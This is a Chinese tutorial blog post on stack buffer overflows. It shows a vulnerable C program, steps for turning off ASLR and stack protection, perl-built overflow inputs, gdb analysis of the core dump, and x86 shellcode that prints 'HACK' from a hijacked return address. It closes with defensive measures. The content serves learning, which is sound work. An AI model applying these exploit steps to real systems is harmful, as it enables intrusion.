浅析缓冲区溢出

c/c++

浏览数:181

2019-3-29

AD:资源代下载服务

最近一直在学习缓冲区溢出漏洞的攻击,但是关于这一块的内容还是需要很多相关知识的基础,例如编程语言及反汇编工具使用。所以研究透彻还需要不少的时间,这里简单的做一个学习的总结,通过具体的实验案例对缓冲区溢出进行简要的解析。
汇编语言及编程语言是基础,其次是对反编译工具的使用:比如gdb、IDA pro、objdump等。汇编语言的学习可以看王爽编写的《汇编语言》,很适合初学者学习的一本书。(对于初学者来说,必要的知识屏蔽是很重要的,这本书就是按这个思想编写,所以看这本书的感觉就非常流畅。)

缓冲区溢出是一种常见的攻击手段,原因在于缓冲区漏洞非常普遍,并且易于实现。缓冲区溢出漏洞占了远程网络攻击的绝大多数,成为远程攻击的主要手段。在CTF比赛中这一类的题目也是非常热门(pwn题)。利用缓冲区溢出攻击可以导致程序运行失败、系统崩溃等后果。更为严重的是,可以利用它执行非授权指令,甚至可以取得系统特权,进而进行各种非法操作。

缓冲区溢出及其原理

关于缓冲区溢出的原理网上也很多,这里用一个我觉得不错的实验示例进行讲解。
先来看以下这个例子:
(注意:此处编译环境为CentOS 5.0 (32bit),其他版本的linux可能需要修改8,9行代码)
首先用C语言编写一个程序,如下所示,保存为buffer.c文件。

1.    # include<unistd.h>  
2.    # include<stdlib.h>  
3.    # include<stdio.h>  
4.    # include<string.h>  
5.      
6.    void function(int a,int b,int c){  
7.            char buffer[8];  //声明一个类型为char的数组
8.            int *ret;    
9.            ret=(int*)(buffer+16);  
10.           (*ret)+=7;  
11.    }  
12.      
13.    int main(){  
14.       int x;  
15.       x=99999;  
16.       function(1,2,3);  
17.       x=1;  
18.       printf("%d\n",x);  
19.       return 0; 
20.    }  

编译源程序

如图1所示,执行#gcc buffer.c –o buffer.o命令,编译源程序。(有些高版本的linux可以加-fno-stack-protector -z execstack参数关闭保护措施 )

执行程序
如图1所示,执行./buffer.o命令,输出结果99999.通过分析主函数的流程,应该输出1,可是输出的为99999。原因在于function()函数。
原因分析
下面对buffer.o程序在内存中的分步情况及执行流程进行分析。
一个程序在内存中通常分为程序段、数据段和堆栈。
(1) 程序段:存放程序的机器码和只读数据
(2) 数据段:存放程序中的静态数据和全局变量
(3) 堆栈:存放动态数据及局部变量
在内存中,它们的位置如图2所示

堆栈是一块保存数据的连续内存,一个名为堆栈指针(SP)的寄存器标识出了栈顶的位置,堆栈的底部在一个固定的地址。(上图)图2简化了一下如图3(下图)所示,栈的增长是由低地址位向高地址位,而堆的增长刚好相反。

理论上说,局部变量可以用SP加偏移量来引用。堆栈由逻辑堆栈帧组成,一个函数对应一个堆栈帧。
当调用函数时,逻辑堆栈帧被压入栈中,堆栈帧包括函数的参数、返回地址、EBP(EBP是当前函数的存取指针,即存储或者读取数时的指针基地址,可以看成一个标准的函数起始代码)和局部变量(如果函数有局部变量)。程序执行结束后,局部变量的内容将会消失,但是不会被清除。
当函数返回时,逻辑堆栈帧从栈中被弹出,然后弹出EBP,恢复堆栈到调用函数时的地址,最后弹出返回地址到EIP(寄存器存放下一个CPU指令存放的内存地址,当CPU执行完当前的指令后,从EIP寄存器中读取下一条指令的内存地址,然后继续执行。),从而继续运行程序。
(如过想多了解一些关于寄存器的知识,可以阅读这篇文章:
https://blog.csdn.net/chenlyc…
接下来,我们来看function(1,2,3)函数,调用函数的过程如图4所示:

首先把参数压入栈:在C语言中参数的压栈顺序是反向的,是以从后往前的顺序将function的3个参数3,2,1压入栈中。
然后保存指令寄存器(ip)中的内容作为返回地址(return2)压入栈中;第3个放入栈的是基址寄存器EBP(sfp)
接着把当前的栈指针(sp)复制到EBP,作为新栈帧的基地址(sfp,栈帧指针)。这里准备进入function函数。
最后把栈指针(sp)减去适当的数值(可以理解为指针由高地址位向低地址位滑动),将局部变量(buffer和ret)压入栈中
执行第9行语句ret=(int)(buffer1+16);后指针ret指向return2所指的存储单元;执行代码中第10行语句(ret)+=7;后,调用函数function()后的返回地址(return2所指的存储单元)指向了第18行,第17行被隔过去了,溢出的数据覆盖了原来的返回地址,因此,该程序的输出结果是99999。
这个就是一个简单的栈溢出的情况。

缓冲区溢出攻击例子
接下来,我们将要思考一段包含了可利用缓冲区溢出的代码,并据此展示一次攻击。
在具体地讨论缓冲区溢出攻击之前,可以先考虑一下此类攻击可能会爆发的现实场景。假设网站上web表单请用户输入数据,如姓名、年龄、出生日期等此类的相关信息。被输入的信息随后被传送到一台服务器上,而这台服务器会将“姓名”字段中输入的数据写入可以容纳N个字符的缓冲区中。如果服务器软件没有去验证可以确保输入的姓名的长度至多为N个字符的话,就可能会发生一次缓冲区溢出。如果溢出的数据是一段恶意代码,那么系统也将可能会去执行,从而受到攻击。

这里我使用的系统是ubuntu 18.04 (64bit)。当前硬件已支持数据保护功能,也即栈上注入的指令无法执行,同时现在的操作系统默认启用地址随机化功能,所有很难猜测到EIP注入的地址。这里就先要把实验环境配置好(这一步很重要,如果实验中出现问题,很大可能就是环境配置的关系):
  1. 关闭地址随机化功能(这里可能会遇到权限问题,可以手动修改,把里面的值改为0即可):
echo 0 > /proc/sys/kernel/randomize_va_space
  1. 这次测试用到的是编译出32位程序,但现在常见的都是64位系统,可以先安装gcc编译32位程序用到的库:
sudo apt-get install libc6-dev-i386

一、创建程序
我们先构建一段代码开始,命名为bo.c。(这里为了直接展示缓冲区漏洞攻击方法,就省掉了与网络相关的部分。)

1.    #include <stdio.h>  
2.    #include <string.h>  
3.      
4.    int f()  
5.    {  
6.        char buf[32];  
7.        FILE *fp;  
8.      
9.        fp = fopen("test.txt", "r");  
10.        if(!fp) {  
11.            perror("fopen");  
12.        }  
13.      
14.        fread(buf, 1024, 1, fp);  
15.        printf("data: %s\n", buf);  
16.        return 0;  
17.    }  
18.      
19.    int main(int argc, char *argv[])  
20.    {  
21.        f();  
22.      
23.        return 0;  
24.    }  

简要的分析下这段代码有溢出问题的原因是:这段程序的作用是输出文件中的字符,它声明的buf数组的字符数量为32,但是拷贝了最多可达1024个字符,因此就可以把文件的字符如果超过一定的数量,就会造成溢出,并被程序执行这些溢出的字符。

二、编译程序
编译源程序,输入如下命令:
gcc -Wall -g -fno-stack-protector -o bo bo.c -m32 -Wl,-zexecstack

这里加了几个参数,它们的功能分别是:
 -fno-stack-protector : 禁用栈溢出检测功能
 -m32 : 生成32位程序
 -Wl,-zexecstack : 支持栈端可执行
看解释就知道为什么加这些参数了。
编译完成之后,我们简要的说明下一步该如何利用溢出进行攻击。思路如下:
使用的也是上一个例子的原理,buf数组溢出后,从文件读取的内容就会在当前栈帧沿着高地址覆盖,而该栈帧的顶部存放着返回上一个函数的地址(EIP),只要我们覆盖了该地址,就可以修改程序的执行路径,使它运行文件中的代码。这种攻击一般也叫做返回库函数攻击。
因此,我们需要知道从文件读取多少个字节才能开始覆盖EIP。常见的方法有两种:
一种方法是反编译程序进行推导,另一种方法就是进行基本的手工测试。第一种方法通常需要更深入的汇编知识,且适用于不知道源码的情况。这里我们已经知道源码,已经发现了问题所在,所以就选择后者进行尝试,确定一下写个多少字节才能覆盖EIP。

三、覆盖EIP
根据源码我们创建text.txt文件并写入字符进行尝试,尝试的方法很简单,EIP前的空间使用’A’填充,而EIP使用’BBBB’填充,使用两种不同的字母是为了方便找到边界。
目前知道buf数组大小为32个字符,可以先尝试填充32个’A’和追加’BBBB’,如果程序没有出现segment fault(段错误),则每次增加’A’字符4个,不断尝试直到程序运行出现segment fault。(我这里到48个的时候出现segment fault,32位系统大概在40左右)如果 ‘BBBB’刚好对准EIP的位置,那么函数返回时,将EIP内容将给PC指针,因为0x42424242(B的ascii码为0x42)是不可访问地址,所以出现segment fault,此时eip寄存器值就是0x42424242。
这里可以手工在文件文件中输入字符,但毕竟繁琐,所以可以使用perl脚本写入(之后写入shellcode也要用到)。
所经过的尝试如下:
第一次:
$ perl -e ‘printf “A”x32 . “B”x4’ > test.txt ;
写入文件中的内容为:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
再运行程序./bo

结果:已溢出,造成输出乱码,但没有segment fault。
第二次增加4个A字符:
$ perl -e ‘printf “A”x36 . “B”x4’ > test.txt ; ./bo

结果:这里也没有segment fault。
之后的步骤省略,直接到出现segment fault的这一步:
$ perl -e ‘printf “A”x48 . “B”x4’ > test.txt ; ./bo

结果:产生了segment fault。
接下来就使用调试工具gdb,分析并确定此时的EIP是否为0x42424242。
1.在使用gdb前,首先输入:
ulimit -c unlimited
用这个命令是为了产生core文件,core就是程序运行发行段错误时的文件。
2.接着运再行一下上面的出错的那条指令
./bo
此时当前目录下会出现一个core文件

3.之后就是使用gdb分析程序:
$ gdb ./bo core –q

分析core文件,发现eip被写成’0x424242’(BBBB),可以确定注入内容中的’BBBB’对准了栈中存放EIP的位置。 找到EIP位置,我们就离成功迈进了一大步。值得注意的是:现在的系统有保护机制,所以找准eip的难度会大大增加。不过现在也有出现了更多有效的方法,感兴趣的朋友可以更深入地进行学习。

四、构造shellcode
通过之前的步骤,我们可以控制EIP之后,下一步操作就是往栈里面注入二进指令,然后修改EIP执行这段代码。那么当函数执行完后,就会执行我们的指令啦。
 通常我们将注入的这段指令称为shellcode,解释为这段指令是打开一个shell(bash),然后攻击者可以在shell执行任意命令,所以称为shellcode。
 这里我们不需要写一段复杂的shellcode去打开shell。为了能证明成功控制程序,我们可以使它在终端上输出”HACK”字符串,然后程序退出。 简便起见, 我们构造的shellcode就相当于下面两句C语言的效果:

1.    write(1, "HACK\n", 5);
2.    exit(0);

因为shellcode将会直接操作寄存器和一些系统调用,所以对于shellcode的编写基本上是用高级语言编写一段程序然后编译,反汇编从而得到16进制的操作码,当然也可以直接写汇编然后从二进制文件中提取出16进制的操作码。 下面就是32位x86的汇编代码shell.s:

1.    BITS 32  
2.    start:  
3.    xor eax, eax  
4.    xor ebx, ebx  
5.    xor ecx, ecx  
6.    xor edx, edx  
7.      
8.    mov bl, 1  
9.    add esp, string - start  
10.    mov ecx, esp  
11.    mov dl, 5  
12.    mov al, 4  
13.    int 0x80  
14.      
15.    mov al, 1  
16.    mov bl, 1  
17.    dec bl  
18.    int 0x80  
19.      
20.    string:  
21.    db "HACK", 0xa  

再编译程序:
nasm -o shell shell.s
之后反编译:
ndisasm shell1
得到如下结果:

现在我们找到了EIP的位置,也有了我们要执行的shellcode,但这个EIP应该修改为什么值,才能在函数返回时执行注入的shellcode呢?
我们可以这样想,从栈的基本模型上看(下图),当函数返回,弹出EBP(栈基址),恢复堆栈到调用函数时的地址,再弹出返回地址到EIP,ESP寄存器的值(栈指针)向上移动,指向我们的shellcode。因此,我们使用上面的注入内容生成core时,ESP寄存器的值就是shellcode的开始地址,也就是EIP应该注入的值。

五、注入shellcode
我们知道要成功执行shellcode就要使EIP的值为shellcode开始的地址。那如何找到shellcode开始的地址呢?我们先尝试着把构造好的shellcode文本给程序执行,使它生成新的core。(这里要先删掉之前的core文件)
$ perl -e ‘printf “A”x48 . “B”x4 . “x31xc0x31xdbx31xc9x31xd2xb3x01x83xc4x1dx89xe1xb2x05xb0x04xcdx80xb0x01xb3x01xfexcbxcdx80x48x41x43x4bx0a”‘ > test.txt ;./bo

再执行gdb ./bo core –q

上面我们知道,ESP的值就是shellcode开始的地址,ESP现在值为0xffffcf70,所有EIP注入值就是该值,(这一步一定要关闭地址随机化功能)。由于X86是小端的字节序,所以注入字节串需要改为”x70xcfxffxff”
然后将EIP原来的注入值’BBBB’变成”x70xcfxffxff”,使eip指向的地址为shellcode开始运行的地址即可。再次测试:
$ perl -e ‘printf “A”x48 . “x70xcfxffxff” . “x31xc0x31xdbx31xc9x31xd2xb3x01x83xc4x1dx89xe1xb2x05xb0x04xcdx80xb0x01xb3x01xfexcbxcdx80x48x41x43x4bx0a”‘> test.txt ;./bo

 结果:程序输出HACK字符串了,说明我们成功控制了EIP,并执行了shellcode。
如果这段shellcode构造的再复杂一些,我们就能做更多的事。
这也是算是最简单的缓冲区溢出漏洞攻击的例子了,所讲的技术也有点过时,对于现在的系统来讲,已经不大可能管用了。但不管怎么样,对于初步的学习还是很助于理解的。一切的学习可以从这个简单的例子出发,一步步的进行更深入下去。然后在其中发现更多的精彩。

缓冲区溢出攻击的防范措施
了解攻击原理是为了能更好的进行防御,最后简要的说明一下如何防范这类攻击的发生。
(1)关闭不需要的特权程序。
(2)及时给系统和服务程序漏洞打补丁。
(3)强制写正确的代码。
(4)通过操作系统使得缓冲区不可执行,从而阻止攻击者植入攻击代码。
(5)利用编译器的边界检查来实现缓冲区的保护,这个方法使得缓冲区溢出不可能出现,从而完全消除了缓冲区溢出的威胁,但是代价比较大。
(6)在程序指针失效前进行完整性检查。
(7)改进系统内部安全机制。

参考文章:https://blog.csdn.net/linyt/a…